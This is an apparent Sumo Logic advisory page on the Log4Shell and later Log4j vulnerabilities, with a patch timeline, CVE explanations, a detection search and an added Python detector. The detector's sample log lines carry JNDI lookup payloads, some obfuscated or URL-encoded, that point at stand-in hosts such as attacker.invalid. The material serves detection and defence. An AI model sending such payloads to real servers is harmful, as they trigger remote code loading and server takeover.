Was Sumo Logic exploited or the service impacted?
For the initial Log4Shell vulnerability through the two subsequent CVEs, our security and engineering teams have confirmed Sumo Logic was NOT exploited and our Sumo Logic Service was never impacted.
Welcome to Sumo Logic’s content hub for the Log4Shell vulnerability with Apache Log4j. This is our official source of communication and updates for this ongoing and developing issue.
We recommend all customers upgrade their Installed Collectors to this latest version (19.375-4) immediately.
For queries and a deeper technical dive on hunting for this activity, check out our Log4Shell CVE-2021-44228 Situational Awareness Brief.
If you’re using Apache Log4j logging services in your organization, please compare your version against this Apache source for details on updating to the latest version to address the recent security vulnerabilities.
Our Content team is actively working on developing dashboards/searches for customers to leverage to help identify potential cases of compromise within their environment.
Using your Sumo Logic platform, here is a common search that you can use to find current versions of the exploit that bad actors may be attempting to abuse, which may help you identify cases in your own environment:
("jndi:" or "{lower:j" or "{upper:j" or "-j}" or ":-j%7") | parse regex "(?<jndi_string>\$\{(?:\$\{[^\}])?j\}?(?:\$\{[^\}])?n\}?(?:\$\{[^\}])?d\}?(?:\$\{[^\}])?i.*?:}?[^,;\"\\]+}?)[\\\";,]" nodrop
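As an added example (this is not Sumo Logic's code or part of the page's search), the Python below implements the same detection idea as the search above: a cheap keyword pre-filter using the search's terms, then a regex that tolerates the per-letter nested-lookup and URL-encoded obfuscations, run over constructed sample access-log lines.

```python
import re
from urllib.parse import unquote

# Coarse pre-filter using the same keywords as the Sumo Logic search above.
PREFILTER = re.compile(r'jndi:|\{lower:j|\{upper:j|-j\}|:-j%7', re.IGNORECASE)

# Each letter of "jndi" may be hidden in its own Log4j lookup, e.g. ${lower:j},
# ${upper:N} or ${::-d}, so allow an optional "${...<letter>}" wrapper per letter.
_W = r'(?:\$\{[^}]*?)?'
_C = r'\}?'
JNDI = re.compile(
    r'\$\{' + _W + 'j' + _C + _W + 'n' + _C + _W + 'd' + _C + _W + 'i' + _C
    + r'\s*:\s*(?P<target>[^,;"\\\s]+)',
    re.IGNORECASE,
)

def find_jndi(line):
    """Return (scheme, target) for the first JNDI lookup string in a log line, else None."""
    decoded = unquote(unquote(line))      # peel up to two layers of URL encoding
    if not PREFILTER.search(decoded):
        return None                       # cheap reject before the costlier regex
    m = JNDI.search(decoded)
    if not m:
        return None
    target = m.group('target').rstrip('}')
    scheme = target.split(':', 1)[0].lower()   # assumes the scheme itself is not obfuscated
    return scheme, target

def scan(lines):
    """Run the detector over log lines; return a list of (line_no, scheme, target) hits."""
    hits = []
    for no, line in enumerate(lines, 1):
        found = find_jndi(line)
        if found:
            hits.append((no, found[0], found[1]))
    return hits

# Constructed sample access-log lines (not real traffic); hosts use the .invalid TLD.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.invalid:1389/a}"',
    '10.0.0.7 - - "GET /?x=${${lower:j}ndi:rmi://c2.invalid/x} HTTP/1.1" 400',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://probe.invalid/z}"',
    '10.0.0.9 - - "GET /?q=%24%7B%24%7Bupper%3Aj%7Dndi%3Aldaps%3A%2F%2Fx.invalid%2Fo%7D HTTP/1.1" 400',
    '10.0.0.10 - - "GET /wiki/jndi:overview HTTP/1.1" 200',   # keyword hit, but no lookup
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOGS):
        print(hit)
```

The last sample line shows why the pre-filter alone is too noisy: it contains "jndi:" but no `${...}` lookup, so only the regex stage decides.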
Beginning early in the morning on Dec. 10th, Sumo Logic’s security team investigated and validated the nature and severity of the exploit against potential points of compromise and determined that at NO time was Sumo Logic exploited.
We use a custom SumoLog4Layout library that never invokes custom lookups (as compared to Apache Log4j) so the Sumo Logic Service was never impacted.
Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so this never posed any significant risk. As a precaution, we released an updated Installed Collector on Dec. 11th with Log4j v2.15.0 in case the situation escalated. With the discovery of CVE-2021-45046, we updated our collector on Dec. 16th with Log4j v2.16.0. With the discovery of CVE-2021-45105, we updated our collector on Dec. 19th with Log4j v2.17.0. On Dec. 29th we updated our collector with Log4j v2.17.1 to proactively protect against CVE-2021-44832.
Sumo Logic remains in constant communication with our customers.
Sumo Logic’s System Security and Global Operations Center teams continue to monitor this situation closely for any change in the nature of the vulnerability, methods of compromise, and detection bypass methods.
On Dec. 29th we published a new version of our Installed Collector, release 19.375-4, which has been updated to leverage Log4j v2.17.1 and address the vulnerability related to CVE-2021-44832. We recommend all customers upgrade their Installed Collectors to this latest version immediately.
Please stay up to date with our latest releases to ensure any potential undiscovered or undisclosed issues in prior Log4j versions are not exploitable.
Sumo Logic’s Customer Support team is following up directly with customers on known vulnerable versions to ensure all customers get to a secure/safe version as soon as possible.
If you have any questions, please contact us at support@sumologic.com
Yes, we highly recommend you update your Sumo Logic Installed Collector. Sumo Logic’s Installed Collector is designed to not invoke anything that it is receiving on the internet. Further, the logging that we do use Log4j for in our collector is for internal audit purposes only—so these vulnerabilities never posed any significant risk. As a precaution, we’ve released four updates (as of 12/29/2021) to our Installed Collector to support patches and updates the Apache Software Foundation has made to their Log4j code.
Log4Shell is a critical (CVSS severity of 10) zero-day vulnerability in Apache Log4j, an open-source Java-based logging tool.
Apache Log4j is the logging tool that’s had (as of this writing) four different vulnerabilities associated with it. The first vulnerability (CVE-2021-44228) garnered the name “Log4Shell” by many in the security community, however, the three subsequent vulnerabilities reported by CVE and the National Vulnerability Database have not been given a nickname at this time.
Hackers can leverage the initial vulnerability (CVE-2021-44228) by sending a specially crafted string that, once logged by Log4j version 2.0 and higher, causes the library to load arbitrary code from an attacker-controlled domain onto the susceptible server, allowing the threat actor to take control of it. This is an RCE (remote code execution) attack.
Later the security community learned that the Log4Shell fix still left Log4j open to attackers. This second vulnerability (CVE-2021-45046) allows threat actors to craft malicious input data using a JNDI Lookup pattern, resulting in a denial of service (DoS) attack. The Apache Software Foundation mitigated this vector by completely removing the message lookups feature in Log4j v2.16.0. Sumo Logic proactively released an Installed Collector with v2.16.0 on Dec. 16th, 2021.
On Dec. 18th, the NVD published a third vulnerability (CVE-2021-45105), since Log4j v2.16.0 did not protect against uncontrolled recursion from self-referential lookups, allowing an attacker to cause a DoS. Sumo Logic proactively released an Installed Collector with v2.17.0 on Dec. 19th, 2021.
On Dec. 28th, the NVD published a fourth vulnerability (CVE-2021-44832), as Log4j v2.17.0 was vulnerable to an RCE attack if an attacker has control of the target LDAP server. Sumo Logic proactively released an Installed Collector with Log4j v2.17.1 on Dec. 29th, 2021.
Any server or device that uses an unpatched version of Apache Log4j is vulnerable, an estimated 3 billion devices at the time of the vulnerability disclosure.
Sumo Logic and other security experts provide additional insights and guidance on the Log4Shell vulnerability and how our Sumo Logic platform can help.
George Gerchow and Roland Palmer discuss the facts on Log4Shell vulnerability and how organizations should respond.
Sumo Logic’s SpecOps team provides an overview and offers recommendations on hunting for and patching against the Log4Shell vulnerability.
Latest release notes for Sumo Logic’s Installed Collector with links to instructions for upgrade options.
Check out this live dashboard our friends at Mjolnir Security built using Sumo Logic’s platform to track Log4j exploit activities.
We understand this is likely an extremely stressful time for you and your security team. If you’re a Sumo Logic customer, we want to assure you that our account team is standing by and ready to help. For any additional technical questions or concerns, please open a case with Sumo Logic Support by contacting them via email, or submitting your request.
If you’re not yet a Sumo Logic customer but would like to gain a better understanding of how we’re helping organizations navigate this and future challenges, please request your own free trial.